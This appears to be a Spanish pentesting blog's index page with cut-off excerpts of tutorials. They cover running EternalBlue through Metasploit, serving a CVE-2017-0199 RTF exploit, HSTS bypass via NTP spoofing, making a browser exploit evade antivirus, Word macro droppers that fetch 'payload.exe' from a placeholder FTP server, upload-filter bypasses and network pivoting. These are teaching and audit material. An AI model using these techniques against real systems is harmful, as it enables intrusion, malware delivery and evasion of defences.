25 Abril, 2017 a las 0:48

Hace algunas semanas se filtró un leak con un arsenal de exploits y herramientas usadas por la NSA. Dicho arsenal incluía entre otras utilidades una serie de herramientas para explotar la vulnerabilidad CVE-2017-010 que afecta a SMB y que no fue parcheada hasta marzo por Microsoft, lo que hace que aún existan muchos equipos vulnerables y la convierte en potencialmente peligrosa.

Es muy importante, si eres administrador de sistemas o usuario final que instales las últimas actualizaciones de Windows para protegerte de estas vulnerabilidades ya que permiten el control remoto total del equipo vulnerable.

Estos exploits se utilizan bajo el propio framework de la NSA, que también se filtró y que tiene como requisitos un equipo Windows con ciertas configuraciones añadidas. Estas peculiaridades unido a que la mayoría de pentesters no estamos familiarizados con dicho framework dan como resultado que no sea una práctica cómoda a pesar de su potencial.

Ahora, la gente de ElevenPaths (@UnaPibaGeek y @pablogonzalezpe) han desarrollado un módulo de Metasploit que permite la ejecución de estos exploits en equipos Linux a través de Metasploit.

Preparar el entorno

Si usas Kali Linux x64 vendrá preparado para usar Wine64, así que el primer paso es configurarlo para que funcione con binarios de 32bits. Aunque este tipo de configuraciones se salen de la temática del blog en mi caso bastó con unos pocos comandos:

dpkg --add-architecture i386 && apt-get update
apt-get install wine32
rm -r ~/.wine
wine cmd.exe
exit

Descargarmos el repositorio del exploit

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

Y movemos el contenido dentro de la carpeta de exploits de metasploit. En mi caso lo dejaré en /usr/share/metasploit-framework/modules/exploits/windows/smb

 

Explotando CVE-2017-010

Como viene siendo habitual, cargaremos metasploit y, en este caso, el exploit con  use exploit/windows/smb/eternalblue_doublepulsar a continuación veremos y explicaremos los diferentes parámetros a configurar con show options:

Los parámetros DOUBLEPULSARPATH y ETERNALBLUEPATH corresponden, como su nombre indica al la ruta donde se encuentran dichos exploits. En nuestro caso como movimos el exploit en  /usr/share/metasploit-framework/modules/exploits/windows/smb la ruta será /usr/share/metasploit-framework/modules/exploits/windows/smb/deps

Continuar leyendo

Categorías: Internet, Pentesting, Seguridad, Sin categoría
Etiquetado , , , , , , , | 12 comentarios

17 Abril, 2017 a las 13:11

El pasado día 8 FireEye anunció haber encontrado una vulnerabilidad en Word que permitía a un usuario ejecutar código VBScript mediante un fichero RTF que contiene un exploit, dicho documento descargará un fichero HTA con el código VBScript y lo ejecutará.

La vulnerabilidad se basa en la no comprobación del formato objetos OLE2Link vinculados por HTTP, que unido a que estos son tratados según el Content-Type de la respuesta HTTP en lugar de su extensión permiten ofrecer un ejecutable HTA en lugar de un supuesto RTF.

Es muy importante que para protegerte de esta vulnerabilidad instales el parche publicado por Microsoft el pasado martes.

Explotación de la vulnerabilidad CVE-2017-0199

Aunque existen varios modos de explotar esta vulnerabilidad vamos a explicar un modo sencillo y eficaz se hacerlo. Hay foros underground (especialmente rusos) que explican cómo hacerlo mediante ingeniería inversa a malware existente pero yo no recomiendo hacerlo así por razones obvias.

Lo primero que necesitaremos es tener un servidor Web con php habilitado. Además, deberemos configurar el servidor para que sea capaz se tratar los ficheros .rtf como si fueran PHP y así ejecutar código PHP. Para ello, si usamos Apache podemos editar el fichero /etc/apache2/mods-enabled/mime.conf y añadir la línea “AddType application/x-httpd-php .rtf”

Ahora habilita los módulos headers y mime ejecutando en la terminal:

a2enmod headers
a2enmod mime
service apache2 restart

Una vez hecho, en un equipo con Word crearemos un documento en Word con el texto que deseemos mostrar en el documento que queramos enviar a la víctima y lo guardaremos con formato RTF, en nuestro caso le pondremos de nombre template.rtf.

Este documento debemos editarlo con un editor de texto plano y añadirle al inicio del mismo un código PHP para que envíe la cabecera application/rtf como se ve en la siguiente imagen.

Continuar leyendo

Categorías: Seguridad, Sin categoría
Etiquetado , , , , , , , , | Escribir un comentario

9 Abril, 2017 a las 0:00

Últimamente veo en gran cantidad de foros y grupos de Telegram gente que empieza con las auditorías de red a aprender técnicas de MitM y a jugar con herramientas como sslstrip2 que se fustran al ver que no pueden realizarlos en algunos sitios como Facebook. El motivo de esto es que estos sitios tienen una característica llamada HSTS, pero ¿qué es HSTS y cual es la diferencia con respecto a HTTPS/SSL?.

Bueno, realmente HSTS (HTTP Strict Transport Security) no es diferente a SSL, realmente HSTS es un añadido a SSL. Para explicar por tanto qué es HSTS vamos a explicar primeramente cómo funcionan normalmente las Webs HTTPS.

  1. El usuario introduce el dominio en su explorador sin indicar el protocolo.
  2. El explorador hace una petición HTTP hacia el servidor Web.
  3. El servidor Web le envía una cabecera indicandole que se dirija a la versión HTTPS
  4. El navegador hace una petición hacia HTTPS.

Si recordamos, las herramientas como SSLstrip funcionan aprovechándose del segundo paso y tercer paso en el cual el navegador hace una consulta insegura contra el servidor Web y este le envía una respuesta igualmente insegura redirigiéndole hacia la versión segura. SSLStrip elimina la cabecera que redirige hacia la versión HTTPS y crea un túnel inseguro entre el atacante y la víctima y otro seguro el atacante y el servidor legítimo, de forma que las peticiones el cliente las haga a el atacante mediante HTTP y el atacante las reenvíe hacia la versión HTTPS.

¿Entonces qué es HSTS y por qué impide que pueda usarse SSLstrip?

Bien, HSTS es una cabecera que envía el servidor Web que indica que a partir de ese momento todas las peticiones que se hagan hacia el servidor se hagan a través de HTTPS independientemente de que se indique el protocolo o no. En esta cabecera, además irá un número de segundos en los que esta directiva debe cumplirse. Aquí podéis ver un ejemplo de dicha cabecera enviada desde www.facebook.com que indica que las futuras peticiones se hagan siempre por HTTPS durante los próximos 15552000 segundos, es decir 180 días.

Por tanto, el único momento donde SSLstrip podría atacar la conexión es la primera conexión que hace el navegador hacia Facebook una vez instalado o la primera vez que se realiza una petición transcurridos 180 días desde la última lo cual hace que el ataque de SSLstrip sea obviamente mucho mas complicado.

Además de esto y por si fuese poco, previniendo que se haga un ataque en la primera conexión (con el navegador recién instalado) algunos navegadores como Google Chrome incorporan precargada una lista de dominios que funcionan mediante HSTS, de forma que la primera conexión nada mas instalar el navegador se haga también mediante HTTPS.

Así pues, podríamos definir que para atacar una web con HSTS es mantener SSLstrip hasta que la directiva caducase, el gran problema es que cada nueva petición enviada hacia la Web renovaría el tiempo que debe permanecer dicha directiva pues la cabecera volverá a enviarse, por tanto la víctima debería haber estado el tiempo suficiente sin usar la Web en cuestión (en nuestro ejemplo 180 días) para que la política caducase. Entonces ¿De qué forma pueden interceptarse el tráfico entre una Web con HSTS y la víctima? la solución mas habitual es cambiar la hora del equipo víctima para hacerlo viajar en el tiempo hasta un momento que la directiva HSTS esté caducada.

Atacando un sitio web con HSTS habilitado gracias a Delorean

Todos sabemos que los sistemas operativos realizan una consulta hacia determinados servidores mediante el protocolo NTP para mantener sincronizado su reloj. Delorean es una utilidad capaz de interceptar las peticiones NTP de la red y modificarlas para así cambiar la hora en los equipos víctimas por tanto si conseguimos establecer el reloj de una máquina fuera del rango de validez de la política Strict-Transport-Security podremos usar sslstrip. En el ejemplo que vamos a poner a continuación usaremos MitMf (un framework para ataques de MitM) y nos ayudaremos de Delorean para invalidar la política de HSTS actual.

Continuar leyendo

Categorías: Internet, Pentesting, Seguridad
Etiquetado , , , , , , , , , | Escribir un comentario

5 Abril, 2017 a las 20:02

OWASP Zap es una herramienta disponible para Linux, Windows y Mac desarrollada dentro del Open Web Application Security Project. Dentro de esta fundación se han desarrollado varias herramientas, entre ellas la que nos ocupa hoy: OWASP ZAP.

Esta herramienta nos permite realizar múltiples pruebas de penetración (SQLi, XSS, Descubriemiento de ficheros, etc) en aplicaciones Web de una forma muy sencilla. Aunque la herramienta en sí tiene un potencial casi infinito (e infinito si lo aderezamos con plugins). En este tutorial vamos a ver las opciones más utilizadas de ZAP y un par de pruebas de concepto.

Cuando iniciemos la aplicación veremos una pantalla donde podremos restaurar una sesión anterior o iniciar una nueva. En nuestro ejemplo ya que vamos a iniciar una auditoría nueva no restauraremos ninguna sesión.

En grande y en la parte derecha tenemos un modo de ataque automático o activo. Si colocamos en input la URL de la Web a auditar comenzará a navegar a través de los diferentes enlaces y a descubrir ficheros ocultos de la misma usando diferentes técnicas como la lectura del fichero robots.txt, spider, etc. En la parte izquierda podemos ver el árbol de consultas, esto es muy útil tanto para descubrir ficheros ocultos como para descubrir formularios post dentro de la Web, etc. Si pulsamos sobre alguna de las peticiones podremos ver en la parte derecha los datos que se enviaron (cabeceras y formularios) así como los que se recibieron, además, pulsando con botón derecho podremos reenviar la petición o modificarla, aunque eso lo veremos mas abajo junto al modo de ataque pasivo.

Cuando el análisis automático haya terminado podremos ver en la parte inferior un listado de alertas y vulnerabilidades sobre el sitio Web.

PoC: Análisis pasivo de un sitio Web: Ataques de fuerza bruta y búsqueda de XSS con ZAP

El análisis pasivo mediante ZAP  nos permite navegar por el sitio Web como si fuésemos un usuario más del sitio y, posteriormente, realizar pruebas de penetración sobre las diferentes partes que hemos visitado. Para ello ZAP creará un proxy en nuestro equipo local. Podemos modificar los parámetros del proxy (como el puerto) yendo a el botón de configuración (rueda dentada) y seleccionando el menú Proxy Local. Una vez configurado a nuestro gusto deberemos configurar nuestro navegador con el proxy localhost y el puerto que hayamos elegido, normalmente el 8080.

Una vez tenemos todo funcionando, si empezamos a navegar por un sitio Web con el navegador, veremos que todas nuestras consultas van quedando reflejadas dentro de ZAP y que podemos consultarlas, modificarlas, etc. Igual que si hubiésemos hecho un análisis activo. La ventaja es obviamente que generaremos mucho menos ruido que con el ataque activo.

Para nuestro ejemplo de fuerza bruta vamos a colocarnos sobre una de las peticiones de tipo POST que se han hecho en un formulario de login, pulsaremos con el botón derecho y dentro del mismo iremos a la opción Atacar>Fuzz.

A continuación se nos abrirá una ventana donde podemos ver los detalles de la petición y la respuesta. Para nuestro primer ejemplo vamos a intentar un ataque de fuerza bruta contra el campo “pwd” correspondiente al password del usuario, así que elegiremos el valor que se ha enviado en la petición y nos iremos al botón “Add” para añadir un diccionario que pruebe en lugar del valor.

Veréis que hay varios de diccionarios ya creados, algunos son, por ejemplo sentencias SQLi o ataques XSS de forma que podamos probar toda una batería de combinaciones contra el campo. En nuestro caso y como vamos a hacer un ataque de fuerza bruta elegiremos un diccionario propio que contenga diferentes tipos de contraseñas

Continuar leyendo

Categorías: Internet, Pentesting, Seguridad
Etiquetado , , , , , , , , , , | Escribir un comentario

31 Marzo, 2017 a las 7:45

Cuando realizamos una auditoría de seguridad y llevamos a cabo una prueba de penetración gastamos una gran cantidad de tiempo y esfuerzo haciendo una correcta recopilación de información y búsqueda de vulnerabilidades en la coorporación. Si a la hora de aplicar este conocimiento para explotar una vulnerabilidad fallamos por que el ataque es detectado por un software antivirus echaremos a perder una gran cantidad de esfuerzo por no haber invertido algo de tiempo en asegurarnos que esto no pase.

Un error común de la gente que está aprendiendo técnicas de pentesting es no hacer caso a este apartado y no preocuparse por ser detectado. Esto pasa principalmente por que realizamos nuestros experimentos en laboratorios controlados y preparados para tener éxito. Cuando nos enfrentamos en un entorno real, en el que nos contratan para una auditoría de seguridad, este entorno es totalmente diferente ya que el cliente espera poder detectar cualquier ataque, por eso es importante invertir parte de nuestro tiempo en este tipo de tareas.

Aunque en este caso usaremos un exploit incluido en Metasploit nos valdrá de base para gran cantidad de exploits client side.

Cuando lanzamos un exploit de navegador -o client side- este se descarga en el equipo remoto y al ser interpretado por el navegador se explota la vulnerabilidad. La casuística de que el exploit se descargue en el equipo víctima da como resultado que este pueda ser interceptado por el software antivirus antes de explotar la vulnerabilidad.

En nuestro ejemplo vamos a usar el exploit firefox_webidl_injection que aprovecha una vulnerabilidad en las versiones de Firefox de 22 a 27 para ejecutar código. Además, en nuestro equipo víctima tendremos instalado el antivirus ESET con la protección a tiempo real activada y la base de datos actualizada. En este escenario vemos al intentar acceder a la URL maliciosa generada por metasploit que el antivirus salta y detecta nuestro exploit.

PoC: Haciendo indetectable un exploit de Metasploit

El primer paso para hacer indetectable el exploit es averiguar qué está llegando al cliente, para ello pausaremos la protección a tiempo real del antivirus y volveremos a acceder a la página. Una vez hecho haremos clic con el botón derecho en el navegador y veremos el código fuente de la página. El código fuente lo copiaremos y lo pegaremos dentro de notepad para poder trabajar cómodamente con él. Una vez hecho volveremos a activar la protección en tiempo real.

Si nos fijamos, una vez activada la protección en tiempo real, si procedemos a guardar el exploit que tenemos pegado en notepad el antivirus detectará el nuevo archivo creado como peligroso y nos saltará la advertencia.

Gracias a esto tenemos una forma de ir realizando cambios en el código hasta que lo hayamos modificado lo suficiente para que el antivirus no detecte la firma del mismo.

Es importante que los cambios que realicemos no afecten al correcto funcionamiento del exploit. Algunos ejemplos de cosas que pueden cambiarse son los nombres de las variables, la asignación de los strings alternando mayúsculas y minúsculas y convirtiendolas al formato correcto en tiempo de ejecución, etc.

Iremos jugando por todo el código y guardando de forma paulatina hasta que el antivirus no sea capaz de detectar el fichero como malicioso. Es una buena idea realizar este proceso con varios antivirus diferentes para tener una mayor seguridad.

En nuestro ejemplo cambiaremos el nombre de una variable “c” por “caracol”, además, el exploit realiza la función windows.open(“chrome://….”), en nuestro ejemplo el string que se pasa a la función windows.open lo partiremos en dos partes y las concatenaremos, de esta forma el funcionamiento del exploit no es alterado pero hemos variado lo suficiente el código para que el antivirus no lo detecte. Una vez que veamos que al guardar no se producen alertas es buena idea analizar el fichero directamente con el antivirus e incluso abrirlo en el navegador para ver que se ejecuta correctamente. Si el antivirus no detecta nada habremos dado con la clave de qué modificar para hacerlo indetectable.

Bien, ahora tenemos nuestro exploit funcional e indetectable a los antivirus. El siguiente paso es dejarlo disponible en un servidor Web. Para ello tenemos dos opciones: A – Colgarlo en nuestro propio servidor Web (apache, ngix, etc). O modificar el exploit dentro de Metasploit para poder usarlo con el framework modificando sus opciones y demás.

Ambas opciones tienen sus pros y sus contras que vamos a explicar: Continuar leyendo

Categorías: Internet, Malware, Pentesting, Programación, Seguridad
Etiquetado , , , , , , , , , | 2 comentarios

28 Marzo, 2017 a las 7:12

Tal y como vimos en la entrada anterior es posible -y sencillo- embeber ficheros .exe y ejecutarlos desde las macros de excel. Esta es una técnica efectiva para ataques de ingeniería social ya que los usuarios suelen desconfiar más a la hora de descargar y ejecutar un fichero .exe que de un .doc, además, esta extensión suele pasar mas desapercibida para sistemas de filtrado por extensiones.

El método que veremos hoy es muy similar -por no decir igual- al que utiliza el falso e-mail de Hacienda que están recibiendo miles de usuarios españoles últimamente y que ha copado páginas de periódicos y webs de noticias. Es importante conocer como funciona cualquier tipo de malware a la hora de crear defensas, así como de concienciar a los usuarios de hacer un uso responsable y no abrir documentos potencialmente peligrosos.

En la primera entrada utilizamos la herramienta exe2vba que viene dentro de la carpeta de Metasploit Framework. Para esta segunda entrada crearemos nuestra propia macro capaz de descargar un archivo desde un servidor ftp y ejecutarlo.

En mi caso particular me parece mas interesante este método a embeber el ejecutable dentro de Word ya que es mas difícil de detectar y, en caso de ser detectado y enviado a una BBDD de alguna compañía antivirus se enviará únicamente el fichero de Word y no el payload, ya que no se encuentra en el equipo ni viaja por los servidores de correo, etc.

Igual que en la entrada anterior he preparado un vídeo donde explico paso a paso como hacerlo como prueba de concepto.

Descargar y ejecutar un ejecutable desde un macro de Office

El primer paso, es como es obvio poner en marcha nuestro servidor FTP. En la práctica lo haremos usando el auxiliar de Metasploit auxiliary/server/ftp. Ahí estableceremos la ruta donde se almacenarán los ficheros del FTP así como el usuario y contraseña. Por último lo ejecutamos en el background con run -j

A continuación crearemos desde Office un fichero Word y generaremos un macro. Este macro debe hacer lo siguiente:

Generar un fichero de comandos FTP:  El comando FTP de Windows tiene una particularidad al ser invocado y es que podemos definirle un fichero de texto que contenga todas las ordenes a ejecutar. Nuestra macro debe crear un archivo que contenga todas las ordenes necesarias para que el comando FTP se conecte al servidor FTP y descargue el archivo necesario en la ruta que queramos y se desconecte. En nuestro caso el fichero generado contendrá algo similar a esto:

open IP_SERVIDOR_FTP
user USUARIO_FTP PASSWORD_FTP
binary
get payload.exe %temp%\payload.exe
bye

Continuar leyendo

Categorías: Malware, Pentesting, Programación
Etiquetado , , , , , , , , , | Escribir un comentario

27 Marzo, 2017 a las 7:12

Una de las particularidades de muchos sistemas de correo es el filtrado por extensiones. Estos sistemas suelen filtrar archivos con extensiones consideradas peligrosas (exe, vbs, bat, python, etc.). de esta forma evitan que si alguien envía “troyano.exe” a un usuario este se infecte. Además de estas extensiones prohibidas estos sistemas suelen ser capaces de examinar archivos comprimidos (.zip, .rar, 7z, tgz, etc.) examinando su contenido y filtrando aquellas extensiones que hemos calificado antes como “peligrosas”.

Si no recuerdo mal, a partir de Office 2010 se implementaron las extensiones “preparadas para macros” (dock y xlsm) para diferenciar los ficheros de office libre de macros de los que no lo son, de esta forma los sistemas de filtrado por extensiones, usados por ejemplo en servidores de correo, pueden hacer su trabajo eliminando los ficheros que tienen macros. Por suerte o por desgracia, Microsoft siempre ha trabajado en la retro compatibilidad de sus aplicaciones y nos sigue permitiendo crear ficheros .doc (Word 97-2003) con macros así como ejecutarlos. Por eso, desde diazsecurity hago un llamamiento a la  importancia vital de concienciar a los usuarios de la peligrosidad de ejecutar macros que no provengan de fuentes de confianza, ya que estos suelen estar concienciados de los .exe pero no con otras extensiones igualmente peligrosas.

Aprovechando estas particularidades suelen haber campañas de malware que se distribuyen por correo de forma mas o menos continuada. Una muestra de ello y la que ha inspirado a abrir esta serie de hilos explicando su funcionamiento ha sido el falso e-mail de la renta que está llegando últimamente a los usuarios. Mediante esta serie de hilos pretendemos conocer el funcionamiento de este tipo de malware.

Como PoC para ver la sencillez y la efectividad de estos ficheros maliciosos vamos a embeber un exe como si fuese un macro de Word, para ello vamos a utilizar dos métodos, en esta primera entrada veremos como hacerlo mediante la herramienta incluída en metasploit exe2vba y en la próxima entrada veremos como generar nuestro propio macro capaz de descargar y ejecutar el payload sin necesidad de herramientas externas. Como experimento, además de la entrada escrita en el blog he creado un vídeo donde podéis ver el paso a paso.

Embeber un ejecutable utilizando exe2vba

Si usáis Kali Linux podéis encontrar esta herramienta en “/usr/share/metasploit-framework/tools/exploit”. Su uso no puede ser mas sencillo.

exe2vba fichero_entrada.exe fichero_salida.vba

Esto nos generará un fichero vba compuesto por dos partes (separadas por comentarios). Por un lado la primera, que contiene el código de la macro y por otro el payload que es un array de los bytes del .exe que hemos introducido.

Continuar leyendo

Categorías: Pentesting, Programación, Proyectos, Seguridad
Etiquetado , , , , , , | 2 comentarios

22 Marzo, 2017 a las 0:14

Hace pocos días vimos un completo post sobre técnicas de pivoting con Metasploit, en el que además de explicar las técnicas en sí, vimos qué es el pivoting y el por qué es necesario en nuestras auditorías. Si aún no lo habéis leído este es el momento de hacerlo. Continuando con el tema de pivoting hoy os explicaré una forma curiosa de pivoting utilizando SSH para utilizarlo como un proxy SOCKS5.

En primer lugar establezcamos un escenario: Tenemos un servidor SSH accesible desde Internet y que ha sido vulnerado, en su misma red local hay uno o varios equipos los cuales no están expuestos a Internet por lo que no podemos auditarlos, como viene siendo costumbre no instalaremos ningún tipo de software en el servidor vulnerado para evitar ser detectados y nos ayudaremos de las técnicas de pivoting para conseguir llegar a esta segunda víctima.

Como vemos, la IP pública del servidor es la 11.11.11.146 y las IP privadas (y no accesibles) son la 10.10.10.136 (servidor SSH) y 10.10.10.129 (nueva victima)

A continuación, desde el equipo atacante estableceremos una conexión contra el servidor SSH y haremos un port-forwarding para usar dicha conexión SSH como proxy. Para esto nos ayudaremos del comando ssh y el modificador -D. El comando es simple y no tiene ningún misterio:

Continuar leyendo

Categorías: Pentesting, Seguridad, Servidores
Etiquetado , , , , , , , | Escribir un comentario

19 Marzo, 2017 a las 23:22

A menudo nos encontramos formularios en Web que nos permiten subir un fichero, como por ejemplo los servidores para subida de imágenes, redes sociales o foros. Un error muy común en este tipo de formularios es no validar correctamente el tipo de documento que se sube. El riesgo de esto claro: Aparece la posibilidad de subir scripts mal intencionados.

A continuación explicaré los métodos de bypass para este tipo de formularios mas comunes.

Cambiando las cabeceras del formulario

Un método común para verificar si lo que se recibe es una imagen o no es leer las cabeceras recibidas, si el Content-Type coincide con uno de los formatos admitidos se da por bueno. El problema es que estas cabeceras son generadas por el navegador y por tanto sencillas de cambiar, un método efectivo de bypassear esta protección es ayudarse de una herramienta como Tamper Data para Firefox y modificar dicha cabecera (text/php) por un formato válido (image/png).

Continuar leyendo

Categorías: Pentesting, Programación, Seguridad, Servidores
Etiquetado , , , , | 5 comentarios

16 Marzo, 2017 a las 19:11

Una de las principales dudas que nos surgen cuando hacemos una auditoría de pentesting y vulnerar un sistema es qué hacer ahora que estamos dentro. Bien, el procedimiento dice que tenemos que volver al punto inicial de la auditoría y recabar información para seguir penetrando a otros sistemas dentro de la red del equipo vulnerado. Para esta segunda parte y poder vulnerar otros sistemas Metasploit (y mas concretamente meterpreter) nos ofrece varias posibilidades.

El primer paso sería obtener las direcciones IP de otros hosts y servidores, para ello podemos hacer uso de técnicas conocidas, como ver la tabla arp (arp -a), trasferencia de zona contra los DNS, etc. Para este ejemplo y ya que estamos con Metasploit vamos a hacer uso del auxiliar arp_scanner que, básicamente, nos permite hacer un escaneo arp contra una sesión de meterpreter. Su uso es sencillo y lo podemos resumir en esta imagen:

Como veis, básicamente cargamos el auxiliar con el comando use, posteriormente establecemos el rango de IPs a escanear y la session de meterpreter donde lanzar el escaneo. Por último lo ejecutamos con el comando run.

Una vez tenemos un listado de IPs el siguiente paso es poder acceder con Metasploit (u otras herramientas) a esos hosts. Una opción inviable es subir nuestras herramientas a la máquina vulnerada por que llamaría la atención y podríamos ser detectados rápidamente. Para evitar tener que hacer esto meterpreter nos facilita dos herramientas utilísimas: Portfwd, con la que podremos redirigir puertos y route, que nos permitirá enrutar el trafico de una IP de la red a través de la máquina comprometida.

Enrutar el tráfico de la red local a través de la máquina comprometida.

Supongamos que queremos acceder a la máquina con IP 10.10.10.128, esta máquina no se encuentra expuesta en Internet, pero nosotros hemos comprometido una máquina cuya IP es la 11.11.11.132 y que comparte red local con la que queremos vulnerar. En principio la máquina 10.10.10.128 nos es inaccesible ya que no está en nuestra red local ni expuesta a internet, pero gracias a route podemos crear una ruta para acceder a las máquinas de esa red local enrutando todo el tráfico por la máquina que hemos vulnerado y que si se encuentra en esa red. El comando es simple:

Continuar leyendo

Categorías: Internet, Pentesting, Seguridad
Etiquetado , , , , , , , , | Escribir un comentario